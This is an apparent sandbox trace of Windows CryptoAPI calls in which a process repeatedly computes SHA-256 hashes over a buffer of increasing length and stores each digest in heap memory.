	[0193.910] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.910] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2309ff0
	[0193.910] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2309ff0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2309ff0, pdwDataLen=0x1283b0) returned 1
	[0193.910] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.910] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.910] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.910] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.910] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x360, dwFlags=0x0) returned 1
	[0193.910] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.910] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230a018
	[0193.910] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230a018, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x230a018, pdwDataLen=0x1283b0) returned 1
	[0193.910] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.910] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.910] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.910] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.910] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x380, dwFlags=0x0) returned 1
	[0193.911] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.911] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230a040
	[0193.911] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x230a040, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x230a040, pdwDataLen=0x1283b0) returned 1
	[0193.911] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.911] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.911] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.911] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.911] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x3a0, dwFlags=0x0) returned 1
	[0193.911] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.911] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230a068
	[0193.911] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230a068, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x230a068, pdwDataLen=0x1283b0) returned 1
	[0193.911] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.911] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.911] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.911] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.911] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x3c0, dwFlags=0x0) returned 1
	[0193.911] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.912] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230a090
	[0193.912] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x230a090, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x230a090, pdwDataLen=0x1283b0) returned 1
	[0193.912] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.912] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.912] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.912] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.912] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x3e0, dwFlags=0x0) returned 1
	[0193.912] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.912] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230a0b8
	[0193.912] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230a0b8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x230a0b8, pdwDataLen=0x1283b0) returned 1
	[0193.912] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.912] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.912] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.912] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.912] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x400, dwFlags=0x0) returned 1
	[0193.912] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.912] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230a0e0
	[0193.912] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x230a0e0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x230a0e0, pdwDataLen=0x1283b0) returned 1
	[0193.913] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.913] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.913] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.913] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.913] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x420, dwFlags=0x0) returned 1
	[0193.913] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.913] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230a108
	[0193.913] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230a108, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x230a108, pdwDataLen=0x1283b0) returned 1
	[0193.913] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.913] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.913] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.913] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.913] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x440, dwFlags=0x0) returned 1
	[0193.913] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.913] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230a130
	[0193.913] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x230a130, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x230a130, pdwDataLen=0x1283b0) returned 1
	[0193.913] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.914] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.914] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.914] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.914] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x460, dwFlags=0x0) returned 1
	[0193.914] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.914] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230a158
	[0193.914] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230a158, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x230a158, pdwDataLen=0x1283b0) returned 1
	[0193.914] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.914] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.914] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.914] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.914] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x480, dwFlags=0x0) returned 1
	[0193.914] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.914] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230a180
	[0193.914] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x230a180, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x230a180, pdwDataLen=0x1283b0) returned 1
	[0193.914] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.914] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.914] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.915] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.915] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x4a0, dwFlags=0x0) returned 1
	[0193.915] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.915] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230a1a8
	[0193.915] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230a1a8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x230a1a8, pdwDataLen=0x1283b0) returned 1
	[0193.915] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.915] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.915] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.915] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.915] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x4c0, dwFlags=0x0) returned 1
	[0193.915] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.915] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230a1d0
	[0193.915] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x230a1d0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x230a1d0, pdwDataLen=0x1283b0) returned 1
	[0193.915] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.915] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.915] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.916] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.916] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x4e0, dwFlags=0x0) returned 1
	[0193.916] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.916] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230a1f8
	[0193.916] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230a1f8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x230a1f8, pdwDataLen=0x1283b0) returned 1
	[0193.916] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.916] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.916] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.916] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.916] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x500, dwFlags=0x0) returned 1
	[0193.916] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.916] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230a220
	[0193.916] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x230a220, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x230a220, pdwDataLen=0x1283b0) returned 1
	[0193.916] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.916] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.916] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.917] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.917] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x520, dwFlags=0x0) returned 1
	[0193.917] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.917] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230a248
	[0193.917] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230a248, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x230a248, pdwDataLen=0x1283b0) returned 1
	[0193.917] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.917] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.917] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.917] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.917] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x540, dwFlags=0x0) returned 1
	[0193.917] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.917] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230a270
	[0193.917] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x230a270, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x230a270, pdwDataLen=0x1283b0) returned 1
	[0193.917] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.917] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.917] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.918] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.918] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x560, dwFlags=0x0) returned 1
	[0193.918] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.918] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230a298
	[0193.918] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230a298, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x230a298, pdwDataLen=0x1283b0) returned 1
	[0193.918] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.918] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.918] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.918] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.918] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x580, dwFlags=0x0) returned 1
	[0193.918] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.918] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230a2c0
	[0193.918] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x230a2c0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x230a2c0, pdwDataLen=0x1283b0) returned 1
	[0193.918] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.918] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.918] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.919] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.919] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x5a0, dwFlags=0x0) returned 1
	[0193.919] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.919] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230a2e8
	[0193.919] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230a2e8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x230a2e8, pdwDataLen=0x1283b0) returned 1
	[0193.919] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.919] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.919] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.919] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.919] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x5c0, dwFlags=0x0) returned 1
	[0193.919] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.919] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230a310
	[0193.919] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x230a310, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x230a310, pdwDataLen=0x1283b0) returned 1
	[0193.919] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.919] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.919] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.920] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.920] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x5e0, dwFlags=0x0) returned 1
	[0193.920] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.920] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230a338
	[0193.920] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230a338, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x230a338, pdwDataLen=0x1283b0) returned 1
	[0193.920] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.920] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.920] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.920] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.920] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x600, dwFlags=0x0) returned 1
	[0193.920] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.920] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230a360
	[0193.920] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x230a360, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x230a360, pdwDataLen=0x1283b0) returned 1
	[0193.920] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.920] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.920] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.921] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.921] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x620, dwFlags=0x0) returned 1
	[0193.921] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.921] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230a388
	[0193.921] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230a388, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x230a388, pdwDataLen=0x1283b0) returned 1
	[0193.921] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.921] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.921] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.921] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.921] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x640, dwFlags=0x0) returned 1
	[0193.921] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.921] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230a3b0
	[0193.921] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x230a3b0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x230a3b0, pdwDataLen=0x1283b0) returned 1
	[0193.921] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.921] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.921] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.922] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.922] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x660, dwFlags=0x0) returned 1
	[0193.922] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.922] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230a3d8
